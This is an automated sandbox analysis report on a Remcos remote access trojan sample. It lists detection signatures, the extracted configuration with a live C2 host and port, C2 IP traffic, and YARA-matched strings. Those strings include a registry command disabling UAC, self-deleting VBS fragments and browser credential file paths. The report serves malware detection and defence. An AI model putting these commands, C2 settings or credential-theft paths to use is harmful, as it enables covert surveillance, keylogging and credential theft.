Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4wECQoBvYC.exe

Overview

General Information

Sample name:4wECQoBvYC.exe
renamed because original name is a hash value
Original sample name:472cd96b1b5771243c40c10cd034324e.exe
Analysis ID:1571962
MD5:472cd96b1b5771243c40c10cd034324e
SHA1:e6544fd71357a36bf5bad454a2662ef3af7a4e03
SHA256:24c3329fc783efce51593d5e4274008fcff8d86f8df9fd8a47ca0af8df1e031d
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Installs a global keyboard hook
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 4wECQoBvYC.exe (PID: 6172 cmdline: "C:\Users\user\Desktop\4wECQoBvYC.exe" MD5: 472CD96B1B5771243C40C10CD034324E)
    • 4wECQoBvYC.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\4wECQoBvYC.exe" MD5: 472CD96B1B5771243C40C10CD034324E)
      • wscript.exe (PID: 1864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["formationslistcomplet2.sexidude.com:30201:0"], "Assigned name": "sol4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kkdhhcnbvyrmqyodgffgfdds-SO2AWR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
        00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
        • 0x6b6f8:$a1: Remcos restarted by watchdog!
        • 0x6bc70:$a3: %02i:%02i:%02i:%03i
        00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
        • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
        • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
        • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
        • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
        • 0x65a04:$str_b2: Executing file:
        • 0x6683c:$str_b3: GetDirectListeningPort
        • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
        • 0x66380:$str_b7: \update.vbs
        • 0x65a2c:$str_b9: Downloaded file:
        • 0x65a18:$str_b10: Downloading file:
        • 0x65abc:$str_b12: Failed to upload file:
        • 0x66804:$str_b13: StartForward
        • 0x66824:$str_b14: StopForward
        • 0x662d8:$str_b15: fso.DeleteFile "
        • 0x6626c:$str_b16: On Error Resume Next
        • 0x66308:$str_b17: fso.DeleteFolder "
        • 0x65aac:$str_b18: Uploaded file:
        • 0x65a6c:$str_b19: Unable to delete:
        • 0x662a0:$str_b20: while fso.FileExists("
        • 0x65f49:$str_c0: [Firefox StoredLogins not found]
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.4wECQoBvYC.exe.c0000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          2.2.4wECQoBvYC.exe.c0000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            2.2.4wECQoBvYC.exe.c0000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              2.2.4wECQoBvYC.exe.c0000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b6f8:$a1: Remcos restarted by watchdog!
              • 0x6bc70:$a3: %02i:%02i:%02i:%03i
              2.2.4wECQoBvYC.exe.c0000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
              • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
              • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x65a04:$str_b2: Executing file:
              • 0x6683c:$str_b3: GetDirectListeningPort
              • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x66380:$str_b7: \update.vbs
              • 0x65a2c:$str_b9: Downloaded file:
              • 0x65a18:$str_b10: Downloading file:
              • 0x65abc:$str_b12: Failed to upload file:
              • 0x66804:$str_b13: StartForward
              • 0x66824:$str_b14: StopForward
              • 0x662d8:$str_b15: fso.DeleteFile "
              • 0x6626c:$str_b16: On Error Resume Next
              • 0x66308:$str_b17: fso.DeleteFolder "
              • 0x65aac:$str_b18: Uploaded file:
              • 0x65a6c:$str_b19: Unable to delete:
              • 0x662a0:$str_b20: while fso.FileExists("
              • 0x65f49:$str_c0: [Firefox StoredLogins not found]
              Click to see the 36 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Script Interpreter Execution From Suspicious Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\4wECQoBvYC.exe, ProcessId: 6172, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PerfectouinVans
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\4wECQoBvYC.exe", ParentImage: C:\Users\user\Desktop\4wECQoBvYC.exe, ParentProcessId: 6580, ParentProcessName: 4wECQoBvYC.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" , ProcessId: 1864, ProcessName: wscript.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T22:42:09.541641+010020327761Malware Command and Control Activity Detected192.168.2.549704181.131.217.24430201TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T22:42:10.906189+010020327771Malware Command and Control Activity Detected181.131.217.24430201192.168.2.549704TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-09T22:42:12.762647+010028033043Unknown Traffic192.168.2.549707178.237.33.5080TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: formationslistcomplet2.sexidude.comAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0.2.4wECQoBvYC.exe.21b0000.2.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["formationslistcomplet2.sexidude.com:30201:0"], "Assigned name": "sol4", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "kkdhhcnbvyrmqyodgffgfdds-SO2AWR", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}
              Multi AV Scanner detection for submitted file
              Source: 4wECQoBvYC.exeReversingLabs: Detection: 28%
              Yara detected Remcos RAT
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004084F3 lstrcmp,CryptDecodeObject,LocalAlloc,CryptDecodeObject,0_2_004084F3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_00408E76 LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCRLContext,CertFreeCRLContext,CertCloseStore,CryptMsgClose,0_2_00408E76
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_00408636 lstrcmp,CryptDecodeObject,FileTimeToLocalFileTime,FileTimeToSystemTime,0_2_00408636
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004086CE lstrcmp,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,0_2_004086CE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004087AE _strlen,MultiByteToWideChar,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CertFindCertificateInStore,_strlen,CertFindCertificateInStore,SystemTimeToFileTime,CertVerifyTimeValidity,0_2_004087AE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_000F293A
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004084F3 lstrcmpA,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_004084F3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00408636 lstrcmpA,CryptDecodeObject,FileTimeToLocalFileTime,FileTimeToSystemTime,2_2_00408636
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004086CE lstrcmpA,CryptDecodeObject,CryptDecodeObject,LocalAlloc,CryptDecodeObject,2_2_004086CE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004087AE _strlen,MultiByteToWideChar,CryptQueryObject,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,CryptMsgGetParam,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,CertFindCertificateInStore,_strlen,CertFindCertificateInStore,SystemTimeToFileTime,CertVerifyTimeValidity,2_2_004087AE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00408E76 LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,2_2_00408E76
              Source: 4wECQoBvYC.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

              Exploits

              barindex
              Yara detected UAC Bypass using CMSTP
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.700c62.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6172, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 4wECQoBvYC.exe PID: 6580, type: MEMORYSTR

              Privilege Escalation

              barindex
              Contains functionality to bypass UAC (CMSTPLUA)
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6764 _wcslen,CoGetObject,2_2_000C6764
              Source: 4wECQoBvYC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CB335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_000CB335
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DB42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,2_2_000DB42F
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000CB53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_000CB53A
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0010D5E9 FindFirstFileExA,2_2_0010D5E9
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C89A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,2_2_000C89A9
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C7A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,2_2_000C7A8C
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6AC2 FindFirstFileW,FindNextFileW,2_2_000C6AC2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D8C69 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_000D8C69
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C8DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,2_2_000C8DA7
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C6F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_000C6F06

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49704 -> 181.131.217.244:30201
              Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:30201 -> 192.168.2.5:49704
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: formationslistcomplet2.sexidude.com
              Source: global trafficTCP traffic: 192.168.2.5:49704 -> 181.131.217.244:30201
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49707 -> 178.237.33.50:80
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DA51B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_000DA51B
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: formationslistcomplet2.sexidude.com
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/
              Source: 4wECQoBvYC.exe, 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: 4wECQoBvYC.exe, 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmp, 4wECQoBvYC.exe, 00000000.00000002.2197049819.00000000021B0000.00000040.00001000.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp:
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
              Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpq
              Source: PerfectouinVans.exe.0.drString found in binary or memory: http://www.evenbalance.com/
              Source: PerfectouinVans.exe.0.drString found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.php
              Source: PerfectouinVans.exe.0.drString found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.phpChecking
              Source: 4wECQoBvYC.exe, PerfectouinVans.exe.0.drString found in binary or memory: http://www.evenbalance.com/index.php?page=pbsvcfaq.phpDisplayVersion%d.%dDisplayNamePunkBuster
              Source: 4wECQoBvYC.exeString found in binary or memory: http://www.evenbalance.com/troubletick
              Source: PerfectouinVans.exe.0.drString found in binary or memory: http://www.evenbalance.com/troubleticket/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Contains functionality to register a low level keyboard hook
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C99E4 SetWindowsHookExA 0000000D,000C99D0,000000002_2_000C99E4
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\4wECQoBvYC.exeJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D59C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_000D59C6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D59C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_000D59C6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000D59C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_000D59C6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000C9B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,2_2_000C9B10
              Source: Yara matchFile source: 2.2.4wECQoBvYC.exe.c0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.4wECQoBvYC.exe.21b0000.2.unpack, type: UNPACKEDPE
